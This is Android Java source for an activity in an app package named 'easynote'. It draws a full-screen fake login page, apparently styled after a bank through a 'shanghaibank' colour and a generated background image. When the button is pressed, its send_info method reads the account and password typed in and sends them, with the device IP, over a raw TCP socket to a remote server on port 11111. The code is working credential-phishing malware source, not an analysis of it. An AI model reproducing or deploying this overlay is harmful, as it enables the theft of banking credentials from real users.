package com.s3lab.easynote.Generater;

import android.content.Intent;
import android.os.Build;
import android.os.Bundle;
import android.os.StrictMode;
import android.util.Log;
import android.view.View;
import android.view.Window;
import android.view.WindowManager;
import android.widget.EditText;
import androidx.appcompat.app.AppCompatActivity;
import androidx.constraintlayout.widget.ConstraintLayout;
import com.s3lab.easynote.R;
import java.io.DataOutputStream;
import java.net.InetAddress;
import java.net.Socket;
import java.net.UnknownHostException;

import static com.s3lab.easynote.AutoConnectServer.connectService.getIP;

public class Additional extends AppCompatActivity {

    public EditText EditText0 = null;
    public EditText EditText1 = null;
    public android.widget.Button Button = null;

    private String SERVER_IP = "here is the remote server ip";

    protected void onCreate(Bundle hello) {
        super.onCreate(hello);
        requestWindowFeature(Window.FEATURE_NO_TITLE);
        Window window = getWindow();
        window.addFlags(WindowManager.LayoutParams.FLAG_DRAWS_SYSTEM_BAR_BACKGROUNDS);
        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {
            window.setStatusBarColor(getResources().getColor(R.color.shanghaibank));
        }
        setContentView(R.layout.demo);
        if (getSupportActionBar() != null){
            getSupportActionBar().hide();
        }
        if (Build.VERSION.SDK_INT > 9) {
            StrictMode.ThreadPolicy policy = new StrictMode.ThreadPolicy.Builder().permitAll().build();
            StrictMode.setThreadPolicy(policy);
        }
        ConstraintLayout constraintLayout = findViewById(R.id.activity11);
        // here is the background image generated by the activity generation engine.
        constraintLayout.setBackgroundResource(R.drawable.demo);

        EditText0 = findViewById(R.id.editText0);
        EditText1 = findViewById(R.id.editText1);

        Button = findViewById(R.id.Button0);
        Button.setOnClickListener(new View.OnClickListener(){
            @Override
            public void onClick(View v) {
                finish();
                send_info();
                finish();
            }
        });
    }

    private void stop() {
        Intent intent = new Intent(this, backService.class);
        stopService(intent);
    }

    //send password to server
    public void send_info(){
        String text0 = EditText0.getText().toString();
        String text1 = EditText1.getText().toString();

        Socket socket = null;
        try {
            InetAddress serverAddr = InetAddress.getByName(SERVER_IP);
            // set the connecting port here
            socket = new Socket(serverAddr, 11111);
            String message = "---Test_Socket_Android---";
            Log.d("TCP", "C: Sending: '" + message + "'");
            DataOutputStream out = new DataOutputStream(socket.getOutputStream());
            String toServer = getIP();
            toServer = toServer + "\ntarget app : app name" + "\naccount : " + text0 + "\npassword : " + text1 + "\n\n\n";
            out.writeUTF(toServer);
            out.flush();

        } catch(UnknownHostException e) {
        } catch(Exception e) {
            e.printStackTrace();
        } finally {
            try {
                socket.close();
            } catch(Exception e) {
                e.printStackTrace();
            }
        }
    }
}
